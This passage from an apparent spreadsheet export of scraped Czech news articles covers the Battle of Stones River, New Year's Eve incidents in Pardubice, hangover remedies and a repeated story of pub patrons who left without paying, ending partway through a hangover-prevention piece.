vystřídal mrznoucí mrholení a plískanice. Nakonec armáda Unie zaujala pozice naproti Braggovi 29. prosince. Shodou okolností si oba velitelé určili jako hlavní postup útok na pravé křídlo toho druhého a shodně naplánovali útok na 31. prosince. Noc na 30. prosince byla pro vojáky v řadě na obou stranách studená, mokrá a bídná. Jedna z unijních kapel začala v noci hrát „Yankee Doodle“ a poté „Hail Columbia“. Na to odpověděla jižanská kapela, když zahrála „Dixie“. Tato přátelská výměna hudby nějakou dobu pokračovala a nálada se zlepšovala. Jeden voják z Tennessee si do deníku zapsal: „Poté, co naše kapely přestaly hrát, mohli jsme slyšet sladký refrén, jak dozníval v chladném a mrazivém vzduchu“. Silvestr svítal chladně a šedě, bitevní pole zakrývaly mlhy a mrholení. Crittendenova vojska se připravovala k útoku na Braggovo pravé křídlo. Průzkumníci generála Philipa Sheridana však zpozorovali zvýšenou aktivitu na levém křídle vojsk Konfederace. Sheridan tedy varazil za generálem McCookem, aby ho informoval o dění na straně Konfederace. McCook ovšem zprávy nebral vážně a šel zase spát. Sheridan ovšem zůstal zneklidněn. Po návratu na svůj úseknařídi svým velitelům vojsko potichu probudit, vydat jim snídani a nechat je nastoupit na bojové pozice. Poté si linii sám prošel, aby se ujistil, že jsou všechny pluky na své pozici. Po zhruba hodině, již během úsvitu obdržel McCook další zprávy o pohybu nepřítele, ty už začal brát vážně a rozkázal vojsko probudit. To ovšem již bylo příliš pozdě. Jen několik minut potom spatřili McCookovi muži v mlze temné postavy, jak se k nim tiše přibližují. Postavy v mlze se začaly proměňovat v nekonečné řady, a nakonec hustou mlhu roztříštilo pověstné ječení konfederačních vojáků. Proti rozespalým a hladovým vojákům unie stálo 11 000 konfederačních vojáků pod vedením generála Williama J. Hardeeho. McCookovi muži začali v panice prchat a během 30 minut ztratil McCook dvě plné brigády. Na pomoc přispěchal generál Sheridan a roztáhl tak své obranné linie. Sheridanovi muži se drželi statečně, ale čtyřem brigádam Konfederace se nemohli bránit nekonečně. Nakonec generál Polk nařídil zaútočit na střed Unijní armády ve snaze zabránit jakýmkoliv posilám dosáhnout McCookova a Sheridanova úseku. Rosecrans sice slyšel bojovou vřavu, nemyslel si ale, že se jedná o něco vážného. Až když mu přišel zoufalý dopis od generála McCooka, uvědomil si závažnost situace. Nařídil Crittendenovi zastavit svůj útok a vyslat posily McCookovi a Sheridanovi . Boj pokračoval v nezmenšené míře a oběti narůstaly na obou stranách. Situaci nezlepšovala ani půda. Tu tvořil většinou vápenec a krev se do něj nevsakovala, spíše se na něm shromažďovala do louží a někde dokonce do tůní. Bojiště působilo tedy více než děsivě. Sheridanova brigáda bojovala nesmírně tvrdě, jelikož sám Sheridan chodil po frontové linii a kontroloval své muže. To se brzy stalo nutností, jelikož Sheridan přišel o všechny své velitele. Po frontové linii se pohyboval i sám Rosecrans. Osobně na koni jezdil po jednotlivých jednotkách, žádal hlášení, sám rozdával rozkazy a povzbuzoval své muže. Známá se stala rozmluva mezi Rosecransem a plukovníkem Williamem Pricem. Když Rosecrans přijel k Priceho jednotce, ze sedla zařval: „Udržíš tenhle brod?“ Price upřímně odpověděl: „Pokusím se, pane!" Rosecrans křičel ještě hlasitěji: „Udržíš tento brod?!“ „Zemřu právě tady, pane!" Rosecrans, stále ještě nespokojený, zakřičel znovu emočněji: „Udržíš tenhle brod?!" „Ano, pane!" Foto: Konfederačním silám se podařilo jednotky Unie dostat do nevýhodné pozice. V tuto chvíi generál Bragg odesílá vítězný telegram prezidentu Davisovi . | Wikimedia Commons / Public domain V poledne se nejtěžší boje přesunuly do oblasti Round Forest. Rosecrans stále osobně přerozděloval vojáky tam, kde to bylo zrovna potřeba bez ohledu na to, k jaké jednotce jednotliví vojáci patří. Když Hardeeho konfederační útok kvůli vysokým ztrátám ztratil momentum, nařídil Bragg Polkovi, aby obnovil svůj útok a zaměřil se na Round Forest. Ten bránila brigáda plukovníka Williama Hazena a Rosecrans mu posílal všechny volné vojáky. Boj to byl nesmírně krutý a krvavý a oblast nejtěžších bojů dostala přezdívku „Hell's Half- Acre “. Ve 13:00 ale i Polkův útok kvůli ztrátám nepostupoval a Bragg nařídil přesunout čtyři čerstvé brigády generála Breckinridge do oblasti bojů. Zatímco Bragg čekal na posily, Rosecransovi se podařilo zformovat obranu a do oblasti přivést pár kusů dělostřelectva. V 16:00 se první dvě Breckinridgeovy brigády přesunuly do linie naproti Round Forest a čekaly na Polkovy rozkazy a také na příjezd zbývajících dvou brigád. Pod tlakem Bragga se však Polk rozhodl nečekat a zahájil útok se dvěma namísto čtyřmi brigádami. Jeho muži tedy pochodovali v šiku přes pole poseté obrovským množstvím mrtvol, když tu na ně překvapivě začalo pálit Unijní dělostřelectvo, i přesto konfederační síly neustále postupovaly, až když se dostaly na vzdálenost 50 yardů (zhruba 45 metrů) od lesa, nařídil Hazen spustit palbu. Palba to byla zničující. Než Breckinridgeovy brigády vůbec došly k lesu, tak jedna ztratila 47% mužstva a druhá 30 %. Bragg rozkázal zbylé dvě brigády také poslat do útoku, což většina jeho důstojníků vnímala jako šílenství, Vojáci Unie totiž dokázali v lese vytvořit efektivní obrané linie. Polk tedy proti své vůli obětoval další dvě brigády v zoufalém útoku. Rosecransovi se podařilo v lese soustředit 50 děl, jejichž obsluha střílela, jak nejrychleji jen mohla. I zbylé dvě brigády potkal stejný osud a nedosáhli žádných výsledků. V jednu chvíli, když Rosecrans projížděl se svým štábem koňmo kolem linií, jedna dělová koule v konfederačního děla proletěla těsně kolem jeho hlavy a zasáhla do hlavy jeho pobočníka a blízkého přítele Julia Gareschého, který bez hlavy na koni ujel ještě 20 metrů, než jeho bezvládné tělo spadlo z koně. Rosecrans si toho ani nevšiml a ani si nevšiml, že má uniformu od Gareschého krve. Se západem slunce zvuky bitvy rychle utichly a ustoupily sténání raněných. Studená, temná, bouřlivá noc byla naplněna pohledem na lucerny plující mezi dvěma řadami, jak se muži z obou stran starali o raněné a umírající. Rosecrans, když viděl ztráty, při setkání velitelů navrhl ústup, což mu ovšem generál George Thomas se slovy „Tato armáda neustupuje!" vymluvil. Na druhé straně Bragg byl plný vítězství. Byl si jistý, že Rosecrans uprchne zpět do Nashville a ještě v noci poslal Davisovi telegram potvrzující vítězství. Byl si vítězstvím tak jistý, že nijak neupravil svou bojovou linii a šel spát. Druhý den ráno, když Bragg viděl, že jednotky Unie své postavení neopustily, nařídil dělostřeleckou palbu za účelem zjistit, jestli jsou Unionisté ochotní své pozice bránit. Na odpověď mu přišla silná dělostřelecká palba a Bragg si uvědomil, že vítězství ještě nemá v kapse. Rozhodl své dělostřelectvo přesunout na kopec nedaleko, což by mu dalo velkou dělostřeleckou výhodu nad Rosecarnsem. Bragg nařídil průzkum oblasti, ale průzkumními mu řekli, že kopec má již pod kontrolou Unie, načež nařídil Breckinridgeovi útok na kopec, což Breckinridge ale odmítl, nicméně Bragg se nenechal odbít. Když se Breckinridge vrátil ke svým mužům a řekl jim, co bylo nařízeno, generál Roger Hanson , velitel brigády sirotků, vybuchl hněvem a rozhodl se jít na velitelství a zastřelil generála Bragga . Breckinridge ho přesvědčil, aby to nedělal, a místo toho šel připravit své vojáky na útok. V 15:00, když Breckinridge shromáždil své muže k útoku, Rosecrans zpozoroval aktivitu a poslal posily přes řeku na vyvýšeninu. Za vyvýšeninou se mu podařilo shromáždit i 58 děl, což byla rozhodující výhoda. O hodinu později začali Breckinridgeovi muži postupovat přes téměř 600 yardů (cca 550 metrů) otevřeného terénu do spáru připravené divize. Navzdory těžkým ztrátám se vojáci z Kentucky nikdy nezastavili ani nezakolísali, a nakonec se jim podařilo Yaneeye z kopce vyhnat. Místo toho, aby pozice zajistili, se rozhodli pronásledovat prchající vojáky, což byla fatální chyba. Dostali se tak do pasti nepřátelské dělostřelecké palby, kdy 58 děl dokázalo vystřelit i stokrát na za minutu a nastal naprostý masakr. Když se Jižané uchýlili k ústupu, nařídil Crittenden zálohám útok na bodáky a zahnal zbytek sirotků z Kentucky za kopec. Po 30 minutách bylo po všem. Když Breckinridge viděl vracející se smutný zbytek sirotčí brigády, zhroutil se a vzlykal: „Moji ubozí sirotci! Moji ubozí sirotci! Moje ubohá brigáda sirotků! Rozsekali to na kusy!" Ještě té noci Bragg svolal schůzi velitelů a ani poté nevěděl, jak postupovat. Ráno 3. ledna se však Bragg osobně přesvědčil, že jeho armáda je za hranicemi svých možností, a v 10:00 nařídil stažení a bitva u Stone's River byla konečně u konce. Bitva byla ve Washingtonu oslavována jako velké vítězství, zatímco prezident Davis a generál Bragg byli za oznámení předčasného vítězství za hlupáky. Konfederace ztratila střední Tennessee a Lincoln tak měl důležité vítězství, které vyvážilo porážku u Fredericksburgu . Bragg zůstal ve vedení armády, protože nebyl nikdo, kdo by ho v postu velitele armády nahradil. Velení byl zbaven pro prohrané Chattanoogské kampani v listopadu 1863. Foto: Ztráty byly děsivé a šly do desetitisíců mrtvých a raněných | Wikimedia Commons / Public domain Pro Williama Rosecranse byla Stones River vrcholem celé jeho kariéry. Sice ještě chvíli vedl armádu Cumberlandu , ale po prohrané bitvě o Chickamauga byl zbaven velení a nahradil ho generál George Henry Thomas . Bitva byla krvavá a ztráty šly do desetitisíců. Armáda Konfederace pod Braggovým vedení ztratila necelých 12 000 vojáků, zatímco Rosencransova vojska přišla o zhruba 14 000 vojáků. Zdroj: American Battlefield Trust, American Civil War Voices Přispívat do diskuze a hlasovat pro vybrané komentáře mohou jen registrovaní. Prosíme, zaregistrujte se nebo se přihlašte! Autor: Tomáš Svoboda Autor person Tomáš Svoboda</t>
  </si>
  <si>
    <t>23490</t>
  </si>
  <si>
    <t>29940</t>
  </si>
  <si>
    <t>20250101_321_3695079733_47b455642f5ebedd3771.html</t>
  </si>
  <si>
    <t>47b455642f5ebedd3771</t>
  </si>
  <si>
    <t>V Pardubickém kraj na silvestra zranění při požáru bytu, záchytka byla plná</t>
  </si>
  <si>
    <t>V Pardubickém kraj na silvestra zranění při požáru bytu, záchytka byla plná 1. ledna 2025 7:36 , aktualizováno 12:43 Sdílet článek ilustrační snímek | foto: Metro.cz V Pardubickém kraji o silvestrovské půlnoci hořel byt v panelovém domě ve Svitavách. Jednoho člověka záchranáři odvezli s lehčím zraněním na chirurgii místní nemocnice. Evakuace domu nebyla nutná. ČTK to dnes řekla mluvčí zdravotnických záchranářů Alena Kisiala. Podle ní to byl nejvážnější případ na silvestra a v prvních hodinách nového roku. Policie řešila v Pardubicích výhrůžnou střelbu. Hasiči na přelomu roku v kraji zasahovali u 32 událostí, z toho bylo 15 požárů. Většinou se jednalo o požáry odpadu nebo popelnic. Zdravotničtí záchranáři podle mluvčí dále zasahovali u devíti intoxikací alkoholem , sedmi napadení, a 25 různých úrazů. "Několik poranění bylo od zábavní pyrotechniky, šlo o poranění prstů a v obličeji," uvedla. Policie v kraji o silvestru přijala 234 volání na tísňovou linku po 221 voláních před rokem a 172 voláních před dvěma lety. "Nejčastěji jsme museli řešit fyzická napadení, občanské soužití a rušení nočního klidu, včetně použití pyrotechniky," uvedla mluvčí policie Iveta Kopecká . Před silvestrovskou půlnocí vyjížděli policisté ke střelbě v bytovém domě v Bělehradské ulici v Pardubicích . "Ve společných prostorách domu chtěl muž výstřelem ze zbraně do stropu a slovními výhrůžkami docílit odchodu třech osob bez domova," uvedla Kopecká . Policisté muže, který byl opilý, zadrželi. Zajistili mu legálně držený revolver, z něhož vystřelil, a také další zbraně, které vlastnil. V dechu muži naměřili téměř 2,5 promile alkoholu . Incident se obešel bez zranění. Příčinou požáru bytu ve Svitavách byla nesprávná manipulace s otevřeným ohněm, uvedl mluvčí hasičů Miroslav Polák. Většina požárů souvisela se silvestrovskými oslavami. "Zábavní pyrotechnika poškodila vozidlo, zapálila živý plot a v několika případech se vznítily obaly od pyrotechniky v kontejnerech a koších nebo zanechané na ulicích," uvedl Polák. V Hlinsku hasiči pomáhali dostat psa schovaného do trubky. Protialkoholní záchytná stanice v Pardubicích byla na silvestra plná již v 20:00, informovala pardubická městská policie s tím, že v Hradci Králové měla protialkoholní záchytná stanice na silvestra zavřeno. Strážníci v Pardubicích například vyjížděli k opilému čtrnáctiletému chlapci a řešili strkanici před barem na třídě Míru. Hlídka strážníků také po půlnoci vykázala opilého muže z vagonu v železničním depu u hlavního nádraží. Autor: ČTK Kam dál? Silvestrovská noc záchranářů. Vyjížděli k potyčkám, opilým i dopravním nehodám Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_322_3694403245_d642b123e2bc07e66184.html</t>
  </si>
  <si>
    <t>d642b123e2bc07e66184</t>
  </si>
  <si>
    <t>Máte kocovinu? Tyto babské rady ji ještě zhorší</t>
  </si>
  <si>
    <t>Máte kocovinu? Tyto babské rady ji ještě zhorší Jana Čiháková | 1. 1. 2025 Silvestr je synonymem bujarých oslav. Ale co dělat, když se ráno probudíte s kocovinou? I když se nabízí řada „zaručených“ babských rad, často víc uškodí, než pomohou. Sezónní tipy Vyrážet klín klínem? V případě kocoviny to není nejlepší nápad. Ačkoli se rádo tvrdí, že sklenice piva může dočasně zmírnit příznaky díky mírnému obsahu alkoholu , pravdou je, že ještě více zatížíte játra a dehydrujete tělo. Výsledkem je, že se nepříjemné dozvuky vydatné noci mohou spíš protáhnout. Místo toho je lepší začít nový rok ideálně vodou nebo iontovým nápojem. Lák z okurek může stav zhoršit Ani lák z kyselých okurek není všespásný. I když má mezi babskými radami svou pevnou pozici, jelikož díky vysokému obsahu soli a octa může pomoci doplnit elektrolyty a podpořit trávení, pro citlivější žaludek jde o příliš intenzivní koktejl, který by mohl zhoršit nevolnost. Ideální je slabý vývar, minerální voda anebo voda kokosová. Minerální voda je jednou z nejlepších voleb při kocovině. Nejenže hydratuje, ale zároveň doplňuje důležité minerální látky, které tělo během nadměrného pití alkoholu ztratilo. Hořčík, vápník a sodík pomáhají stabilizovat elektrolytickou rovnováhu a zmírňují bolesti hlavy, zimnici nebo svalové křeče. Doporučuje se volit nesycenou nebo jen jemně perlivou variantu, aby nedocházelo k dráždění žaludku. Vhodné je i popíjení kokosové vody, která je považována za přírodní zdroj elektrolytů, který může být dokonce účinnější než běžné sportovní nápoje. Obsahuje draslík, sodík a hořčík, které podporují hydrataci a pomáhají tělu rychleji se zotavit. Navíc je šetrná k žaludku, což z ní dělá skvělou volbu, pokud vám není dobře. Stačí ji popíjet po malých doušcích, aby se tekutiny vstřebávaly postupně. Úlevu můžete také pocítit, pokud si uděláte studený zázvorový čaj nebo si dáte jemnou zázvorovou limonádu, které jsou známé harmonizujícími účinky na žaludek a zažívání. Coca-Cola : Možná ta neslazená Coca-Cola je mezi babskými radami poměrně populární, ale její účinnost je diskutabilní. Obsahuje cukr, který může krátkodobě dodat energii, a kyselinu fosforečnou, která může u některých lidí zklidnit žaludek. Na druhou stranu ale kofein dehydratuje a vysoký obsah cukru může způsobit prudké výkyvy hladiny glukózy v krvi, což kocovinu spíš zhorší. Pokud po ní sáhnete, pijte ji velmi opatrně a ideálně s kostkou ledu, která zpomalí její účinek. Co dělat, když je vám opravdu zle Pokud máte kocovinu spojenou s nevolností nebo zvracením, první krok je nechat tělo dělat svou práci. Zvracení je přirozený způsob, jak se organismus zbavuje zbytků alkoholu a toxinů. Hlavně zůstaňte v klidu, a jakmile se žaludek trochu uklidní, zkuste po malých doušcích pít. Pokud nemůžete pít, zkuste cucat kostku ledu – tělo tekutiny vstřebá pomalu, což může být snesitelnější. Pokud žaludek odmítá stravu, netlačte na pilu. Zkuste něco velmi jemného, například naškrábaný banán, který dodá draslík. Skvělou variantou je i slabý vývar, který dodá tělu sůl a minerální látky, aniž by ho zatížil. Další možností je pár lžiček obyčejného bílého jogurtu – je lehce stravitelný a obsahuje probiotika, která mohou pomoci zklidnit zažívání. V neposlední řadě se vyspěte! Spánek je nejlepší lék. Pokud to jde, dopřejte si ráno několik dalších hodin odpočinku. Během spánku tělo intenzivně regeneruje a odbourává zbytkové toxiny. Pokud se vám usnout nedaří, zkuste se alespoň uvolnit vleže s klidnou hudbou nebo meditací. V případě silné kocoviny není nutné nutit se do pohybu. Stačí otevřít okno, aby se do místnosti dostal čerstvý vzduch. Několik hlubokých nádechů a výdechů může pomoci zlepšit okysličení organismu a přinést alespoň částečnou úlevu. Příště buďte chytřejší Aby se příští rok neopakoval stejný scénář, pamatujte na pár základních pravidel. Mezi alkoholem pijte dostatek vody, nevynechávejte jídlo a vyhněte se příliš sladkým nebo mixovaným nápojům, které mávají hladinou cukru v krvi. Vždy mějte po ruce lehké snídaně na ráno a dostatek vody pro rychlý start do nového dne. Přece – kocovina není ideální způsob, jak začít nový rok. Související články Sezónní tipy Jana Čiháková | 3. 1. 2025 Co se pitného režimu týče, mnozí z nás v zimě polevují. Jednoduše proto, že nemáme pocit žízně jako například v letních měsících. Vody… Sezónní tipy Kateřina Kiliánová | 3. 1. 2025 Dostáváme se do éry, na kterou naše těla ani mysl nejsou evolučně připravené. Neustále rostoucí nároky a tlak moderní společnosti… Sezónní tipy Jana Čiháková | 12. 12. 2024 Sestavili jsme seznam 10 potravin, které možná zbytečně přehlížíte, ale jejich zdravotní přínosy rozhodně nelze podcenit. Ačkoliv jsou často opomíjené,… Sezónní tipy Kateřina Kiliánová | 14. 11. 2024 Když staří Římané vymysleli svařené víno , patrně vůbec netušili, že jeho věhlas neuhasne ani v dalších tisíciletích a že bude… Témata [email protected] Granville, s.r.o. Počernická 272/96, 108 00 Praha 10 - Malešice IČ 28967623, DIČ CZ28967623 Komerční banka 115-6969270247/0100 Obchodní rejstřík vedený Městským soudem v Praze , oddíl C, vložka 156568 Partneři 2019-2024 © Granville | Webdesign: Mango marketing CZ TEST využívá zpravodajství z databází ČTK , jejichž obsah je chráněn autorským zákonem. Přepis, šíření či další zpřístupňování obsahu CZ TEST či jeho části veřejnosti, a to jakýmkoliv způsobem, je bez předchozího souhlasu CZ TEST výslovně zakázáno. Obsah stránek www.cz-test.cz je průběžně aktualizován. Provozovatel neručí za aktuálnost a úplnost informací na těchto internetových stránkách. Provozovatel může kdykoliv bez předchozího upozornění provádět změny informací na těchto internetových stránkách. Provozovatel nenese žádnou odpovědnost za případné škody, které uživatelům mohou vzniknout v souvislosti s užíváním stránek. Provozovatel neodpovídá za obsah sdělení, které si mezi sebou vyměňují uživatelé některých částí internetových stránek (diskusní fóra, diskusní skupiny), a vyhrazuje si právo odstranit sdělení, které obsahuje jakoukoliv informaci, kterou je možné považovat za protiprávní, urážlivou nebo jinak nepřijatelnou. Pokud není uvedeno jinak, použité fotografie jsou z fotobanky Shutterstock. Spravovat souhlas s cookies Abychom poskytli co nejlepší služby, používáme k ukládání a/nebo přístupu k informacím o zařízení, technologie jako jsou soubory cookies. Souhlas s těmito technologiemi nám umožní zpracovávat údaje, jako je chování při procházení nebo jedinečná ID na tomto webu. Nesouhlas nebo odvolání souhlasu může nepříznivě ovlivnit určité vlastnosti a funkce. Funkční Vždy aktivní Technické uložení nebo přístup je nezbytně nutný pro legitimní účel umožnění použití konkrétní služby, kterou si odběratel nebo uživatel výslovně vyžádal, nebo pouze za účelem provedení přenosu sdělení prostřednictvím sítě elektronických komunikací. Předvolby Technické uložení nebo přístup je nezbytný pro legitimní účel ukládání preferencí, které nejsou požadovány odběratelem nebo uživatelem. Statistiky Technické uložení nebo přístup, který se používá výhradně pro statistické účely. Technické uložení nebo přístup, který se používá výhradně pro anonymní statistické účely. Bez předvolání, dobrovolného plnění ze strany vašeho Poskytovatele internetových služeb nebo dalších záznamů od třetí strany nelze informace, uložené nebo získané pouze pro tento účel, obvykle použít k vaší identifikaci. Marketing Technické uložení nebo přístup je nutný k vytvoření uživatelských profilů za účelem zasílání reklamy nebo sledování uživatele na webových stránkách nebo několika webových stránkách pro podobné marketingové účely. Autor: svetpotravin Rubrika transition_slide Sezónní tipy</t>
  </si>
  <si>
    <t>151</t>
  </si>
  <si>
    <t>20250101_323_3694372045_f12a1e04688c67f3c2bc.html</t>
  </si>
  <si>
    <t>f12a1e04688c67f3c2bc</t>
  </si>
  <si>
    <t>Vypili pěknou řádku piv a panáků a pak se snažili utéct bez placení</t>
  </si>
  <si>
    <t>Vypili pěknou řádku piv a panáků a pak se snažili utéct bez placení Dva muži vypili v pondělí odpoledne každý pěknou řádku piv a panáků, jenomže pak se snažili krátce po sobě nenápadně zmizet z podniku bez zaplacení. Zasáhnout musela hlídka českobudějovické městské policie. Ilustrační foto 1. ledna 2025 - 07:30 Zákazník, který sice obsluze nejprve přislíbil zaplacení útraty, nakonec skončil v poutech strážníků. Jeho nelibost se totiž obrátila proti nim a začal jim vyhrožovat ublížením na zdraví. Potíže se zákonem ho však ještě čekají. V pondělí 30. prosince krátce po třetí hodině odpoledne vyjížděla hlídka městské policie na oznámení o muži, který právě odešel z pivnice v Nádražní ulici bez zaplacení tučné útraty. Na místě se strážníci od obsluhy podniku dozvěděli, že v půl druhé přišli dva zákazníci, kteří se začali značně posilňovat alkoholickými nápoji. Po vypití osmi sklenic piva a několika panáků tvrdého alkoholu se však jeden z nich zvedl k odchodu. Muž zůstávající u stolu přislíbil, že útratu za svého kamaráda zaplatí. Jenomže za několik minut poté vstal od stolu a rychlým krokem mířil ke dveřím. Když na něj zaměstnankyně podniku volala, snažil se vytáčet s tím, že jde pouze na toaletu. Mezitím však rychle vyklouzl ze dveří a vzal nohy na ramena. Žena ho ještě několik ulic pronásledovala a když ho doběhla, muž se na ní podíval a divil se, co po něm chce, že ji vůbec nezná. Při následném zásahu hlídky městské policie se dušoval, že nikomu neublížil a nikoho nezabil a co by měl platit ženě, kterou nikdy neviděl. Zrak i paměť mu zjevně zamlžil vypitý alkohol . Následně provedená orientační dechová zkouška na alkohol u něj ukázala výsledek přes 2 promile. Tím však jeho eskapády nekončily. Když totiž začal vyhrožovat strážníkům likvidací, skončil v poutech. Těch ho strážníci zbavili až po zklidnění a přislíbení, že se odebere domů. Před propuštěním ho poučili o tom, že případ pro něj nekončí. Za přestupek proti majetku mu kromě zaplacení neuhrazené útraty v pivnici hrozí pokuta až 50 tisíc korun. Jihoceskenovinky.cz informovala Mgr. Věra Školková, tisková mluvčí MP České Budějoice. (rp,jihoceskenovinky.cz,foto:mp ceskebudejovice)</t>
  </si>
  <si>
    <t>20250101_324_3709394906_1febb15cfd7b42d2f760.html</t>
  </si>
  <si>
    <t>1febb15cfd7b42d2f760</t>
  </si>
  <si>
    <t>První zprávy - Vypili pěknou řádku piv a panáků a pak se snažili utéct bez placení</t>
  </si>
  <si>
    <t>První zprávy - Vypili pěknou řádku piv a panáků a pak se snažili utéct bez placení Velikost textu: Vypili pěknou řádku piv a panáků a pak se snažili utéct bez placení Dva muži vypili v pondělí odpoledne každý pěknou řádku piv a panáků, jenomže pak se snažili krátce po sobě nenápadně zmizet z podniku bez zaplacení. Zasáhnout musela hlídka českobudějovické městské policie. Ilustrační foto 1. ledna 2025 - 07:30 Zákazník, který sice obsluze nejprve přislíbil zaplacení útraty, nakonec skončil v poutech strážníků. Jeho nelibost se totiž obrátila proti nim a začal jim vyhrožovat ublížením na zdraví. Potíže se zákonem ho však ještě čekají. V pondělí 30. prosince krátce po třetí hodině odpoledne vyjížděla hlídka městské policie na oznámení o muži, který právě odešel z pivnice v Nádražní ulici bez zaplacení tučné útraty. Na místě se strážníci od obsluhy podniku dozvěděli, že v půl druhé přišli dva zákazníci, kteří se začali značně posilňovat alkoholickými nápoji. Po vypití osmi sklenic piva a několika panáků tvrdého alkoholu se však jeden z nich zvedl k odchodu. Muž zůstávající u stolu přislíbil, že útratu za svého kamaráda zaplatí. Jenomže za několik minut poté vstal od stolu a rychlým krokem mířil ke dveřím. Když na něj zaměstnankyně podniku volala, snažil se vytáčet s tím, že jde pouze na toaletu. Mezitím však rychle vyklouzl ze dveří a vzal nohy na ramena. Žena ho ještě několik ulic pronásledovala a když ho doběhla, muž se na ní podíval a divil se, co po něm chce, že ji vůbec nezná. Při následném zásahu hlídky městské policie se dušoval, že nikomu neublížil a nikoho nezabil a co by měl platit ženě, kterou nikdy neviděl. Zrak i paměť mu zjevně zamlžil vypitý alkohol . Následně provedená orientační dechová zkouška na alkohol u něj ukázala výsledek přes 2 promile. Tím však jeho eskapády nekončily. Když totiž začal vyhrožovat strážníkům likvidací, skončil v poutech. Těch ho strážníci zbavili až po zklidnění a přislíbení, že se odebere domů. Před propuštěním ho poučili o tom, že případ pro něj nekončí. Za přestupek proti majetku mu kromě zaplacení neuhrazené útraty v pivnici hrozí pokuta až 50 tisíc korun. Jihoceskenovinky.cz informovala Mgr. Věra Školková, tisková mluvčí MP České Budějoice. (rp,jihoceskenovinky.cz,foto:mp ceskebudejovice)</t>
  </si>
  <si>
    <t>1200</t>
  </si>
  <si>
    <t>20250101_325_3694364363_43a535b406226d9894b0.html</t>
  </si>
  <si>
    <t>43a535b406226d9894b0</t>
  </si>
  <si>
    <t>Vypili pěknou řádku piv a panáků a pak se snažili utéct bez placení regiony Dva muži vypili v pondělí odpoledne každý pěknou řádku piv a panáků, jenomže pak se snažili krátce po sobě nenápadně zmizet z podniku bez zaplacení. Zasáhnout musela hlídka českobudějovické městské policie. Ilustrační foto 1. ledna 2025 - 07:30 Zákazník, který sice obsluze nejprve přislíbil zaplacení útraty, nakonec skončil v poutech strážníků. Jeho nelibost se totiž obrátila proti nim a začal jim vyhrožovat ublížením na zdraví. Potíže se zákonem ho však ještě čekají. V pondělí 30. prosince krátce po třetí hodině odpoledne vyjížděla hlídka městské policie na oznámení o muži, který právě odešel z pivnice v Nádražní ulici bez zaplacení tučné útraty. Na místě se strážníci od obsluhy podniku dozvěděli, že v půl druhé přišli dva zákazníci, kteří se začali značně posilňovat alkoholickými nápoji. Po vypití osmi sklenic piva a několika panáků tvrdého alkoholu se však jeden z nich zvedl k odchodu. Muž zůstávající u stolu přislíbil, že útratu za svého kamaráda zaplatí. Jenomže za několik minut poté vstal od stolu a rychlým krokem mířil ke dveřím. Když na něj zaměstnankyně podniku volala, snažil se vytáčet s tím, že jde pouze na toaletu. Mezitím však rychle vyklouzl ze dveří a vzal nohy na ramena. Žena ho ještě několik ulic pronásledovala a když ho doběhla, muž se na ní podíval a divil se, co po něm chce, že ji vůbec nezná. Při následném zásahu hlídky městské policie se dušoval, že nikomu neublížil a nikoho nezabil a co by měl platit ženě, kterou nikdy neviděl. Zrak i paměť mu zjevně zamlžil vypitý alkohol . Následně provedená orientační dechová zkouška na alkohol u něj ukázala výsledek přes 2 promile. Tím však jeho eskapády nekončily. Když totiž začal vyhrožovat strážníkům likvidací, skončil v poutech. Těch ho strážníci zbavili až po zklidnění a přislíbení, že se odebere domů. Před propuštěním ho poučili o tom, že případ pro něj nekončí. Za přestupek proti majetku mu kromě zaplacení neuhrazené útraty v pivnici hrozí pokuta až 50 tisíc korun. Jihoceskenovinky.cz informovala Mgr. Věra Školková, tisková mluvčí MP České Budějoice. (rp,jihoceskenovinky.cz,foto:mp ceskebudejovice)</t>
  </si>
  <si>
    <t>18880</t>
  </si>
  <si>
    <t>20250101_326_3694365456_004a90bd6aafcf68470e.html</t>
  </si>
  <si>
    <t>004a90bd6aafcf68470e</t>
  </si>
  <si>
    <t>Jak se co nejrychleji zbavit kocoviny? Záleží, co sníte před konzumací alkoholu a co potom</t>
  </si>
  <si>
    <t>Jak se co nejrychleji zbavit kocoviny? Záleží, co sníte před konzumací alkoholu a co potom Jak si užít vánoční a silvestrovské oslavy a netrpět přitom větší kocovinou, než by bylo nutné? Nejlepší je samozřejmě se alkoholu vyhnout úplně nebo zavčas přestat. To se nicméně snadno říká, v praxi ale většinou obtížně dodržuje. Proto je nejlepší se dobře připravit předem, pamatovat na pár pravidel během večera a sáhnout po těch správných potravinách následující ráno. Jak minimalizovat nepříjemné následky kocoviny? Co v článku najdete Co jíst a pít před konzumací alkoholu ? Co dodržovat během popíjení? Co udělat před spaním? Jaké další potraviny pomohou vystřízlivět? Vše mějte připravené Co jíst a pít před konzumací alkoholu ? Nejhorší příznaky kocoviny způsobuje zejména dehydratace, snížená hladina cukru a ztráta některých vitamínů a minerálů (zejména sodíku a draslíku). Všeobecně je proto důležité myslet před i během pití alkoholu na dostatečný příjem tekutin, doplňování elektrolytů a potřebných látek. Již od rána před oslavou začněte pít čistou vodu, abyste si zavodnili organismus . A dobře se najezte. Na druhou stranu to nepřehánějte s těžkými a příliš tučnými jídly. Pomohou kvalitní zdroje bílkovin, tuků a sacharidů. Například pokrmy obsahující těstoviny, rýži, celozrnné pečivo, avokádo, lososa, vejce, hovězí, kuřecí maso apod. Před popíjením i po něm je rovněž důležité tělo zásobit některými klíčovými vitamíny a minerály, zejména B-komplexem a zinkem. Podle studie publikované v The Journal of Clinical Medicine , která sledovala vliv konzumovaných potravin 24 hodin před a po požití alkoholu , se prokázalo, že účastníci se stravou bohatou na vitamín B a zinek dosáhli vystřízlivění mnohem rychleji . Proxima Studio / Shutterstock.com Co dodržovat během popíjení? Ideálně nemíchejte více druhů alkoholu . Z tvrdého dávejte přednost čirým (vodce, ginu, bílému rumu apod.), které neobsahují tolik konergenů neboli vedlejších produktů fermentačního procesu způsobujících intenzivnější příznaky kocoviny. Tmavší druhy (červené víno , bourbon, whisky) jich obsahují více, proto je po nich také větší bolehlav. Pamatujte na pravidlo 1 : 1 – každou sklenici alkoholu zapijte sklenicí vody nebo neochucené minerálky. Nezapomínejte na průběžné pojídání pro zpomalení vstřebávání alkoholu . Co udělat před spaním? I když se vám opravdu nebude chtít, ještě před spaním vypijte alespoň 2 sklenice vody . Můžete jimi rovnou zapít tablety B-komplexu, vitamínu C nebo zinku a hořčíku . Někdo také doporučuje sníst kousek čerstvé okurky , která je bohatá na vodu, vitamíny C, A a B i sodík, draslík, zinek nebo fosfor. Jaké další potraviny pomohou vystřízlivět? Mléko – je účinné na překyselený žaludek a 